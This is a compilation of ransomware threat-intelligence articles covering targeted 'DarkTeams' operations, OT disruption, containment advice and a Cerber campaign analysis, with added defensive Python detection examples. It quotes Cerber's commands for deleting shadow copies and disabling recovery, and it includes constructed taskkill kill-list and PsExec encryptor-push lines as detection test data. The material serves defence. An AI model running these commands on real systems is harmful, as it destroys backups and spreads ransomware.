              During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators moved into this emerging sector, leveraging their infection capabilities, their long-term hacking experience and their bots to monetize their actions through new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow-up ransomware within infected hosts. A typical example is the GandCrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

              Many major cyber criminal groups developed a sort of malicious "RedTeam" unit; let's call them "DarkTeams". These units are able to manually engage high-value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network right after ensuring the deletion of the backup copies. Many times they also use industry-specific knowledge to tamper with management networks and hypervisors, reaching an impressive level of potential damage.
              Actually, this kind of behaviour is not new to us. Such methods of operation have been used for a long time, but not by such a large number of actors and not with such objectives. Network penetration was in fact a peculiarity of state-sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referred to as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
              During 2019, we observed a strong game change in the ransomware attack panorama.

              The special "DarkTeams" replicated advanced intrusion techniques from APT playbooks, carrying them into private business sectors that were not traditionally prepared to deal with such threats. Then, they started to hit organizations with high-impact business attacks modeled to be very effective in the victim's context. We are facing the evolution of ransomware with the introduction of Targeted Ransomware Attacks.

              We observed and tracked many gangs consolidating the new Targeted Ransomware Attack model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operations of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they were only the tip of the iceberg. Many other criminal groups have consolidated this kind of operation, such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
              In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shaming of their victims. Maze was one of the first actors pioneering this practice in 2019: the group started to disclose the names of the private companies they hacked into, along with pieces of internal data stolen during the network intrusions.

              The problem grows when the stolen data includes Intellectual Property and Personally Identifiable Information. In such a case the attacker leaves the victim organization in an additional, unfortunate position during the cyber-crisis: handling the data breach and the fines imposed by the Data Protection Authorities. During 2020 we expect these practices to become more and more common in criminal ecosystems. Thus, adopting a proactive approach to the Cyber Security Strategy, leveraging services like Yoroi's Cyber Security Defence Center, could be crucial to equip the company with the proper technology to acquire visibility on targeted ransomware attacks, and with the knowledge, skills and processes to spot and handle this new class of threats.

              Zero-Day Malware

              Well-known threats are always easier to recognize and manage, since their components and intents are very often clear. For example ransomware, as known today, performs some standard operations such as (but not limited to): reading a file, encrypting it and writing it back. Early discovery of known threat families helps analysts perform quick and precise analyses, while unknown threats are always difficult to manage, since analysts first need to discover the intentions and then map the behaviour back to standard operations. This is why we track Zero-Day Malware. Yoroi's technology captures and collects samples before processing them on Yoroi's shared threat intelligence platform, trying to attribute them to known threats.

              As part of the automatic analysis pipeline, Yoroi's technology reports whether the malicious files are potentially detected by Anti-Virus technologies at detection time. This check is mainly done to figure out whether the incoming threat would be able to bypass perimeter and endpoint defences. As a positive side effect we collect data on detected threats related to their notoriety. In other words, we are able to see whether malware belonging to a threat actor or related to a specific operation (or incident) is detected by AV, firewalls, Next Generation X products and the endpoints in use.
              In this context, we shall define what we mean by Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of an arbitrary malware family. The following image (Fig. 1) shows how most of the analyzed malware is unknown to the InfoSec community and to common antivirus vendors. This finding supports the picture of an ever-evolving malware panorama in which attackers start from a shared code base but modify it depending on their need to be stealthy.

              (Fig. 1: image not reproduced)

              The reported data are collected during the first propagation of the malicious files across organizations. This means companies are highly exposed to the risk of Zero-Day malware. Detection and response time plays a central role in such cases, where the attack remains stealthy for hours or even days.
              Along with the Zero-Day malware observation, most of the known malware at time of delivery does not have high chances of being blocked by security controls. 8% of the malware is detected by few AV engines and only 33% is actually well identified at time of attack. Even so-called "known malware" is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed, less than 20% of the analyzed samples belonging to the "not Zero-Day" set are detected by more than 15 AV engines.

              Drilling down and observing the behavioural classification of the intercepted samples known by fewer than 5 antivirus engines at detection time, we see that the "Dropper" behaviour (i.e. the downloading or unpacking of other malicious stages or components) leads the way with 54% of cases, slightly decreasing since 2018. One more interesting trend in the analyzed data is the surprising decrease of ransomware behaviour, dropping from 17% in 2018 to the current 2%, and the sharp rise of "Trojan" behaviour up to 35% of cases, more than double the 15% of 2018.
              This trend supports the evidence that ransomware attacks in 2019 began to follow a targeted approach, as described in the "The Rise of Targeted Ransomware" section.


              A reasonable interpretation of the striking changes in these data could actually conform with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, much of the delivered malware is actually a single part of a more complex infection chain, a chain able to install multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.

              This trend gets further validation in the Zero-Day malware data set: the samples likely unknown to the InfoSec community at the time of delivery substantially shifted their distribution from previous years. In particular, ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan rose from 28% to 52% of cases, showing similar macro variations.
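              The three measurements the report builds its argument on (the share of samples no engine knows at delivery time, the behaviour mix within the slice known by fewer than 5 engines, and the share of non-zero-day samples caught by more than 15 engines) are easy to reproduce over your own triage data. The following is an added example, not Yoroi's code or data: it runs those three aggregations over a small constructed sample set, where the engine counts and behaviour labels are hypothetical values chosen only to exercise each bucket.

```python
from collections import Counter

# Constructed sample set: (label, number of AV engines flagging the sample at
# delivery time, behavioural class). Hypothetical values, not Yoroi's data.
SAMPLES = [
    ("s01", 0, "Dropper"), ("s02", 0, "Trojan"),                      # unknown to every engine
    ("s03", 2, "Dropper"), ("s04", 4, "Trojan"),                      # known by a few engines
    ("s05", 1, "Ransomware"), ("s10", 3, "Dropper"),
    ("s06", 7, "Trojan"), ("s07", 12, "Dropper"),                     # moderately known
    ("s08", 20, "Ransomware"), ("s09", 30, "Trojan"),                 # well known
]


def detection_bucket(engines):
    """Notoriety bucket from the engine count at delivery time."""
    if engines == 0:
        return "zero-day"      # no vendor knows the sample: the report's Zero-Day class
    if engines < 5:
        return "low"           # "detected by few AV engines"
    if engines <= 15:
        return "medium"
    return "well-known"        # "detected by more than 15 AV engines"


def _percent(part, whole):
    return round(100.0 * part / whole, 1) if whole else 0.0


def bucket_distribution(samples):
    """Percentage of samples per notoriety bucket."""
    counts = Counter(detection_bucket(n) for _, n, _ in samples)
    return {b: _percent(c, len(samples)) for b, c in counts.items()}


def behaviour_share(samples, max_engines=4):
    """Behaviour mix among samples known by at most `max_engines` engines
    (the report's "fewer than 5 AV engines" slice)."""
    subset = [b for _, n, b in samples if n <= max_engines]
    counts = Counter(subset)
    return {b: _percent(c, len(subset)) for b, c in counts.items()}


def known_but_well_detected(samples, threshold=15):
    """Share of non-zero-day samples detected by more than `threshold` engines."""
    known = [n for _, n, _ in samples if n > 0]
    return _percent(sum(1 for n in known if n > threshold), len(known))


if __name__ == "__main__":
    print("notoriety buckets:", bucket_distribution(SAMPLES))
    print("behaviour within <5 engines:", behaviour_share(SAMPLES))
    print("known samples caught by >15 engines:", known_but_well_detected(SAMPLES), "%")
```

              The point of computing `known_but_well_detected` separately is the one the report makes: a sample that is not zero-day can still be nearly invisible at delivery time, so "known" alone says little about whether perimeter or endpoint controls would have stopped it.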


              If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

              Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT

              Since at least 2017, there has been a significant increase in public disclosures of ransomware incidents impacting industrial production and critical infrastructure organizations. Well-known ransomware families like WannaCry, LockerGoga, MegaCortex, Ryuk, Maze, and now SNAKEHOSE (a.k.a. Snake / Ekans), have cost victims across a variety of industry verticals many millions of dollars in ransom and collateral costs. These incidents have also resulted in significant disruptions and delays to the physical processes that enable organizations to produce and deliver goods and services.

              While lots of information has been shared about the victims and immediate impacts of industrial sector ransomware distribution operations, the public discourse continues to miss the big picture. As financial crime actors have evolved their tactics from opportunistic to post-compromise ransomware deployment, we have observed an increase in adversaries’ internal reconnaissance that enables them to target systems that are vital to support the chain of production. As a result, ransomware infections—either affecting critical assets in corporate networks or reaching computers in OT networks—often result in the same outcome: insufficient or late supply of end products or services.

              Truly understanding the unique nuances of industrial sector ransomware distribution operations requires a combination of skillsets and visibility across both IT and OT systems. Using examples derived from our consulting engagements and threat research, we will explain how the shift to post-compromise ransomware operations is fueling adversaries’ ability to disrupt industrial operations.

              Industrial Sector Ransomware Distribution Poses Increasing Risk as Actors Move to Post-Compromise Deployment

              The traditional approach to ransomware attacks predominantly relies on a “shotgun” methodology that consists of indiscriminate campaigns spreading malware to encrypt files and data from a variety of victims. Actors following this model will extort victims for an average of $500 to $1,000 USD and hope to receive payments from as many individuals as possible. While early ransomware campaigns adopting this approach were often considered out of scope for OT security, recent campaigns targeting entire industrial and critical infrastructure organizations have moved toward adopting a more operationally complex post-compromise approach.

              In post-compromise ransomware incidents, a threat actor may still often rely on broadly distributed malware to obtain their initial access to a victim environment, but once on a network they will focus on gaining privileged access so they can explore the target networks and identify critical systems before deploying the ransomware. This approach also makes it possible for the attacker to disable security processes that would normally be enough to detect known ransomware indicators or behaviors. Actors cast wider nets that may impact critical systems, which  expand the scale and effectiveness of their end-stage operations by inflicting maximum pain on the victim. As a result, they are better positioned to negotiate and can often demand much higher ransoms—which are commonly commensurate with the victims’ perceived ability to pay and the value of the ransomed assets themselves. For more information, including technical detail, on similar activity, see our recent blog posts on FIN6 and TEMP.MixMaster.


              Figure 1: Comparison of indiscriminate vs. post-compromise ransomware approaches

              Historical incidents involving the opportunistic deployment of ransomware have often been limited to impacting individual computers, which occasionally included OT intermediary systems that were either internet-accessible, poorly segmented, or exposed to infected portable media. In 2017, we also observed campaigns such as NotPetya and BadRabbit, where wiper malware with worm-like capabilities were released to disrupt organizations while masquerading as ransomware. While these types of campaigns pose a threat to industrial production, the adoption of post-compromise deployment presents three major twists in the plot.

              • As threat actors tailor their attacks to target specific industries or organizations, companies with high-availability requirements (e.g., public utilities, hospitals, and industrial manufacturing) and perceived abilities to pay ransoms (e.g., higher revenue companies) become prime targets. This represents an expansion of financial crime actors’ targeting of industries that process directly marketable information (e.g., credit card numbers or customer data) to include the monetization of production environments.
              • As threat actors perform internal reconnaissance and move laterally across target networks before deploying ransomware, they are now better positioned to cast wide nets that impact the target’s most critical assets and negotiate from a privileged position.
              • Most importantly, many of the tactics, techniques, and procedures (TTPs) often used by financial actors in the past, resemble those employed by high-skilled actors across the initial and middle stages of the attack lifecycle of past OT security incidents. Therefore, financial crime actors are likely capable of pivoting to and deploying ransomware in OT intermediary systems to further disrupt operations.

              Organized Financial Crime Actors Have Demonstrated an Ability to Disrupt OT Assets

              An actor’s capability to obtain financial benefits from post-compromise ransomware deployment depends on many factors, one of which is the ability to disrupt systems that are the most relevant to the core mission of the victim organizations. As a result, we can expect mature actors to gradually broaden their selection from only IT and business processes, to also OT assets monitoring and controlling physical processes. This is apparent in ransomware families such as SNAKEHOSE, which was designed to execute its payload only after stopping a series of processes that included some industrial software from vendors such as General Electric and Honeywell. At first glance, the SNAKEHOSE kill list appeared to be specifically tailored to OT environments due to the relatively small number of processes (yet high number of OT-related processes) identified with automated tools for initial triage. However, after manually extracting the list from the function that was terminating the processes, we determined that the kill list utilized by SNAKEHOSE actually targets over 1,000 processes.

              In fact, we have observed very similar process kill lists deployed alongside samples from other ransomware families, including LockerGoga, MegaCortex, and Maze. Not surprisingly, all of these code families have been associated with high-profile incidents impacting industrial organizations for the past two years. The earliest kill list containing OT processes we identified was a batch script deployed alongside LockerGoga in January 2019. The list is very similar to those used later in MegaCortex incidents, albeit with notable exceptions, such as an apparent typo on an OT-related process that is not present in our SNAKEHOSE or MegaCortex samples: “proficyclient.exe4”. The absence of this typo in the SNAKEHOSE and MegaCortex samples could indicate that one of these malware authors identified and corrected the error when initially copying the OT-processes from the LockerGoga list, or that the LockerGoga author failed to properly incorporate the processes from some theoretical common source of origin, such as a dark web post.


              Figure 2: ‘proficyclient.exe’ spelling in kill lists deployed with LockerGoga (left) and SNAKEHOSE (right)

              Regardless of which ransomware family first employed the OT-related processes in a kill list or where the malware authors acquired the list, the seeming ubiquity of this list across malware families suggests that the list itself is more noteworthy than any individual malware family that has implemented it. While the OT processes identified in these lists may simply represent the coincidental output of automated process collection from target environments and not a targeted effort to impact OT, the existence of this list provides financial crime actors opportunities to disrupt OT systems. Furthermore, we expect that as financially motivated threat actors continue to impact industrial sector organizations, become more familiar with OT, and identify dependencies across IT and OT systems, they will develop capabilities—and potentially intent—to disrupt other systems and environments running industrial software products and technology.
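              Because the kill list travels between ransomware families largely unchanged, the list itself is a useful thing to hunt for: a batch script that terminates a long run of processes, some of them industrial software, is worth flagging whichever payload it arrives with. The following is an added example, not Mandiant's code or a list from any sample, that parses a constructed kill-list batch script, matches the targeted process and service names against a defender-maintained watch list of OT-related names, and also catches the mistyped variant (`proficyclient.exe4`) the text describes by normalising trailing digits after the extension. `proficyclient.exe` is the only name taken from the page; every other process and service name is a hypothetical placeholder, not a real product.

```python
import re

# Constructed kill-list batch script in the style the text describes. Process names other
# than proficyclient.exe are hypothetical placeholders, not real OT software.
KILL_SCRIPT = r"""
@echo off
taskkill /IM proficyclient.exe4 /F
taskkill /IM example_hmi_runtime.exe /F
taskkill /IM example_historian.exe /F
taskkill /IM sqlservr.exe /F
taskkill /IM excel.exe /F
net stop "Example SCADA Service" /y
taskkill /F /IM msaccess.exe
"""

# Defender's watch list of industrial process/service names (constructed; in practice
# populate it from the asset inventory of the OT environment being protected).
OT_PROCESS_WATCHLIST = {"proficyclient.exe", "example_hmi_runtime.exe", "example_historian.exe"}
OT_SERVICE_WATCHLIST = {"example scada service"}

TASKKILL_RX = re.compile(r'taskkill\b.*?/im\s+("?)([^\s"]+)\1', re.I)
NETSTOP_RX = re.compile(r'net\s+stop\s+("?)([^"]+?)\1(?:\s|$)', re.I)


def normalize(name):
    """Lower-case and drop digits appended after .exe, so 'proficyclient.exe4'
    compares equal to 'proficyclient.exe' (the typo discussed in the text)."""
    name = name.strip().lower()
    return re.sub(r'(\.exe)\d+$', r'\1', name)


def parse_kill_list(script):
    """Return (process image names, service names) targeted by a batch kill script."""
    procs, svcs = [], []
    for line in script.splitlines():
        m = TASKKILL_RX.search(line)
        if m:
            procs.append(m.group(2))
            continue
        m = NETSTOP_RX.search(line)
        if m:
            svcs.append(m.group(2))
    return procs, svcs


def assess(script):
    """Summarise how much of a kill script touches OT-related names."""
    procs, svcs = parse_kill_list(script)
    exact = [p for p in procs if p.lower() in OT_PROCESS_WATCHLIST]
    near = [p for p in procs
            if p.lower() not in OT_PROCESS_WATCHLIST and normalize(p) in OT_PROCESS_WATCHLIST]
    svc_hits = [s for s in svcs if s.lower() in OT_SERVICE_WATCHLIST]
    return {
        "total_targets": len(procs) + len(svcs),
        "ot_exact": exact,
        "ot_near": near,          # mistyped or suffixed variants of watch-listed names
        "ot_services": svc_hits,
        "ot_relevant": bool(exact or near or svc_hits),
    }


if __name__ == "__main__":
    for key, value in assess(KILL_SCRIPT).items():
        print(f"{key}: {value}")
```

              Reporting near matches separately matters for two reasons the text hints at: a mistyped entry such as `proficyclient.exe4` never actually terminates the process (so it is harmless to that asset but still a strong fingerprint of the shared list), and the exact spelling can help tell apart which lineage of the list a given sample carries.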

              Ransomware Deployments in Both IT and OT Systems Have Impacted Industrial Production

              As a result of adversaries’ post-compromise strategy and increased awareness of industrial sector targets, ransomware incidents have effectively impacted industrial production regardless of whether the malware was deployed in IT or OT. Ransomware incidents encrypting data from servers and computers in corporate networks have resulted in direct or indirect disruptions to physical production processes overseen by OT networks. This has caused insufficient or late supply of end products or services, representing long-term financial losses in the form of missed business opportunities, costs for incident response, regulatory fines, reputational damage, and sometimes even paid ransoms. In certain sectors, such as utilities and public services, high availability is also critical to societal well-being.

               The best-known example of ransomware impacting industrial production through an IT network infection is Norsk Hydro’s incident from March 2019, where disruptions to Business Process Management Systems (BPMS) forced multiple sites to shut down automation operations. Among other collateral damage, the ransomware interrupted communication between IT systems that are commonly used to manage resources across the production chain. Interruptions to these information flows, which carry data such as product inventories, forced employees to identify manual alternatives to handle more than 6,500 stock-keeping units and 4,000 shelves. FireEye Mandiant has responded to at least one similar case where TrickBot was used to deploy Ryuk ransomware at an oil rig manufacturer. While the infection was confined to corporate networks, the biggest business impact came from disruption of the Oracle ERP software, which took the company temporarily offline and negatively affected production.

              Ransomware may result in similar outcomes when it reaches IT-based assets in OT networks, for example human-machine interfaces (HMIs), supervisory control and data acquisition (SCADA) software, and engineering workstations. Most of this equipment relies on commodity software and standard operating systems that are vulnerable to a variety of IT threats. Mandiant Intelligence is aware of at least one incident in which an industrial facility suffered a plant shutdown due to a large-scale ransomware attack, based on sensitive sources. The facility's network was improperly segmented, which allowed the malware to propagate from the corporate network into the OT network, where it encrypted servers, HMIs, workstations, and backups. The facility had to reach out to multiple vendors to retrieve backups, many of which were decades old, which delayed complete restoration of production.

               As recently as February 2020, the Cybersecurity and Infrastructure Security Agency (CISA) released Alert AA20-049A describing how a post-compromise ransomware incident had affected control and communication assets on the OT network of a natural gas compression facility. Impacts to HMIs, data historians, and polling servers resulted in loss of availability and loss of view for human operators. This prompted an intentional shutdown of operations that lasted two days.

              Mitigating the Effects of Ransomware Requires Defenses Across IT and OT

              Threat actors deploying ransomware have made rapid advances both in terms of effectiveness and as a criminal business model, imposing high operational costs on victims. We encourage all organizations to evaluate their safety and industrial risks related to ransomware attacks. Note that these recommendations will also help to build resilience in the face of other threats to business operations (e.g., cryptomining malware infections). While every case will differ, we highlight the following recommendations.

              For custom services and actionable intelligence in both IT and OT, contact FireEye Mandiant Consulting, Managed Defense, and Threat Intelligence.

              • Conduct tabletop and/or controlled red team exercises to assess the current security posture and ability of your organization to respond to the ransomware threat. Simulate attack scenarios (mainly in non-production environments) to understand how the incident response team can (or cannot) detect, analyze, and recover from such an attack. Revisit recovery requirements based on the exercise results. In general, repeatedly practicing various threat scenarios will improve awareness and ability to respond to real incidents.
              • Review operations, business processes, and workflows to identify assets that are critical to maintaining continuous industrial operations. Whenever possible, introduce redundancy for critical assets with low tolerance to downtime. The right amount and type of redundancy is unique for each organization and can be determined through risk assessments and cost-benefit analyses. Note that such analyses cannot be conducted without involving business process owners and collaborating across IT and OT.
              • Logically segregate primary and redundant assets either by a network-based or host-based firewall with subsequent asset hardening (e.g., disabling services typically used by ransomware for its propagation, like SMB, RDP, and WMI). In addition to creating policies to disable unnecessary peer-to-peer and remote connections, we recommend routine auditing of all systems that potentially host these services and protocols. Note that such architecture is generally more resilient to security incidents.
               • When establishing a rigorous backup program, pay special attention to ensuring the security (integrity) of backups. Critical backups must be kept offline or, at minimum, on a segregated network.
              • Optimize recovery plans in terms of recovery time objective. Introduce required alternative workflows (including manual) for the duration of recovery. This is especially critical for organizations with limited or no redundancy of critical assets. When recovering from backups, harden recovered assets and the entire organization's infrastructure to prevent recurring ransomware infection and propagation.
              • Establish clear ownership and management of OT perimeter protection devices to ensure emergency, enterprise-wide changes are possible. Effective network segmentation must be maintained during containment and active intrusions.
              • Hunt for adversary intrusion activity in intermediary systems, which we define as the networked workstations and servers using standard operating systems and protocols. While the systems are further away from direct control of physical processes, there is a much higher likelihood of attacker presence.
               • Note that every organization is different, with unique internal architectures and processes, stakeholder needs, and customer expectations. Therefore, all recommendations should be carefully considered in the context of the individual infrastructure. For instance, proper network segmentation is highly advisable for mitigating the spread of ransomware. However, organizations with limited budgets may instead decide to leverage redundant asset diversification, host-based firewalls, and hardening as an alternative to segregating with hardware firewalls.

              Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

              UPDATE (Oct. 30, 2020): We have updated the report to include additional protection and containment strategies based on front-line visibility and response efforts in combating ransomware. While the full scope of recommendations included within the initial report remain unchanged, the following strategies have been added into the report:

              • Windows Firewall rule configurations to block specific binaries from establishing outbound connections from endpoints
              • Domain Controller isolation and recovery planning steps
              • Proactive GPO permissions review and monitoring guidance

              Ransomware is a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization - including the loss of access to data, systems, and operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls can be overwhelming. Ransomware has become an increasingly popular choice for attackers over the past few years, and it’s easy to understand why given how simple it is to leverage in campaigns – while offering a healthy financial return for attackers.

              In our latest report, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment, we discuss steps organizations can proactively take to harden their environment to prevent the downstream impact of a ransomware event. These recommendations can also help organizations with prioritizing the most important steps required to contain and minimize the impact of a ransomware event after it occurs.

              Ransomware is commonly deployed across an environment in two ways:

              1. Manual propagation by a threat actor after they’ve penetrated an environment and have administrator-level privileges broadly across the environment:
                • Manually run encryptors on targeted systems.
                • Deploy encryptors across the environment using Windows batch files (mount C$ shares, copy the encryptor, and execute it with the Microsoft PsExec tool).
                • Deploy encryptors with Microsoft Group Policy Objects (GPOs).
                • Deploy encryptors with existing software deployment tools utilized by the victim organization.
              2. Automated propagation:
                • Credential or Windows token extraction from disk or memory.
                • Trust relationships between systems – and leveraging methods such as Windows Management Instrumentation (WMI), SMB, or PsExec to bind to systems and execute payloads.
                • Unpatched exploitation methods (e.g., EternalBlue – addressed via Microsoft Security Bulletin MS17-010).
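
The manual-propagation batch file described in item 1, and the WMI/PsExec binding in item 2, leave a recognisable trace: one source host reaching many C$/ADMIN$ shares in quick succession. The following is an added example, not code from the report, that scores that fan-out over constructed process-creation events; the hostnames, the user name and the encryptor path are hypothetical.

```python
"""Flag the batch-file / PsExec / WMIC fan-out used to push an encryptor.

Added example, not FireEye's or Mandiant's code. The events are constructed
in the shape of process-creation telemetry (host, user, timestamp, command
line); hostnames, the user name and the encryptor path are hypothetical.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each pattern captures the remote host a command line reaches for:
# an admin share (mount/copy), a PsExec target, or a WMIC /node: target.
TARGET_PATTERNS = [
    re.compile(r"\\\\([A-Za-z0-9_.-]+)\\(?:C\$|ADMIN\$)", re.I),
    re.compile(r"psexec(?:64)?(?:\.exe)?\s+\\\\([A-Za-z0-9_.-]+)", re.I),
    re.compile(r'wmic(?:\.exe)?\s+/node:"?([A-Za-z0-9_.-]+)', re.I),
]


def remote_target(cmdline):
    """Lower-cased remote host named in the command line, or None."""
    for pattern in TARGET_PATTERNS:
        match = pattern.search(cmdline)
        if match:
            return match.group(1).lower()
    return None


def detect_fanout(events, window=timedelta(minutes=10), min_targets=5):
    """One alert per (source host, user) that reaches min_targets or more
    distinct remote hosts inside `window`. Routine admin work rarely touches
    that many C$/ADMIN$ shares this quickly; a deployment script does."""
    per_source = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        target = remote_target(ev["cmdline"])
        if target and target != ev["host"].lower():
            per_source[(ev["host"], ev["user"])].append((ev["ts"], target))
    alerts = []
    for (host, user), hits in per_source.items():
        for i, (start, _) in enumerate(hits):
            in_window = {t for ts, t in hits[i:] if ts - start <= window}
            if len(in_window) >= min_targets:
                alerts.append({"source": host, "user": user, "first_seen": start,
                               "targets": sorted(in_window)})
                break
    return alerts


T0 = datetime(2020, 10, 30, 2, 0, 0)
SERVERS = [f"SRV{i:02d}" for i in range(1, 7)]
SAMPLE_EVENTS = (  # constructed: the mount / copy / execute push from one workstation
    [{"host": "WS-ADMIN01", "user": "CORP\\svc_backup", "ts": T0 + timedelta(seconds=10 * n),
      "cmdline": f"net use \\\\{s}\\C$ /user:CORP\\svc_backup ********"}
     for n, s in enumerate(SERVERS)]
    + [{"host": "WS-ADMIN01", "user": "CORP\\svc_backup", "ts": T0 + timedelta(seconds=60 + 10 * n),
        "cmdline": f"copy C:\\Windows\\Temp\\enc.exe \\\\{s}\\C$\\Windows\\Temp\\enc.exe"}
       for n, s in enumerate(SERVERS)]
    + [{"host": "WS-ADMIN01", "user": "CORP\\svc_backup", "ts": T0 + timedelta(seconds=120 + 10 * n),
        "cmdline": f"psexec.exe \\\\{s} -accepteula -s -d C:\\Windows\\Temp\\enc.exe"}
       for n, s in enumerate(SERVERS)]
    + [  # benign: one helpdesk user reaching a single file server
        {"host": "WS-HELP07", "user": "CORP\\jdoe", "ts": T0 + timedelta(minutes=3),
         "cmdline": "net use \\\\FS01\\C$"}]
)

if __name__ == "__main__":
    for alert in detect_fanout(SAMPLE_EVENTS):
        print(alert)
```

The window and target threshold are starting points; tune them against the environment's own baseline of legitimate software-deployment and backup accounts, which are exactly the identities a threat actor with broad administrator rights tends to reuse.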

              The report covers several technical recommendations to help organizations mitigate the risk of and contain ransomware events including:

              • Endpoint segmentation
              • Hardening against common exploitation methods
              • Reducing the exposure of privileged and service accounts
              • Cleartext password protections

              If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

              Read the report today.

              *Note: The recommendations in this report will help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.

              Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

              Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

              On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

              Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

              FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

              Attack Process

              The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

              1. Target receives and opens a Word document.
              2. Macro in document is invoked to run PowerShell in hidden mode.
              3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
              4. On successful connection, the ransomware is written to the disk of the victim.
              5. PowerShell executes the ransomware.
               6. The malware configures multiple concurrent persistence mechanisms by creating Command Processor, screensaver, startup folder, Run and RunOnce entries.
              7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
              8. Files are encrypted and messages are presented to the user requesting payment.

              Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

              The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

              PowerShell Abuse

              When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

              Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

              It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

               In this case we observed the macro code calling PowerShell with arguments that bypass the execution policy and run it with a hidden window and a Base64-encoded command, with the intention that PowerShell would download the ransomware and execute it without the victim’s knowledge.

              Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

              Cerber in Action

              Initial payload behavior

               Upon execution, the Cerber malware checks where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\<GUID>), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen pseudo-randomly from the executables in the %WINDIR%\system32 folder.

               If the malware is not launched from that folder, then after eliminating any blacklisted filenames from an internal list it creates a renamed copy of itself at “%APPDATA%\<GUID>” using a pseudo-randomly selected name from the “system32” directory, executes the copy from the new location, and then cleans up after itself.

              Shadow deletion

               As with many other ransomware families, Cerber bypasses UAC checks, deletes any volume shadow copies, and disables the Windows startup repair and recovery options. Cerber accomplishes this by launching the following processes with the respective arguments:

              Vssadmin.exe "delete shadows /all /quiet"

              WMIC.exe "shadowcopy delete"

              Bcdedit.exe "/set {default} recoveryenabled no"

               Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures"

              Coercion

              People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

              Figure 2. A message to the victim after encryption

              The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.

              Figure 3. Ransom offered to victim, which is discounted for five days

              Multilingual Support

              As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

               Figure 4. Interface provided to the victim to pay the ransom supports 12 languages

              Encryption

               Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as .ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

              Selective Targeting

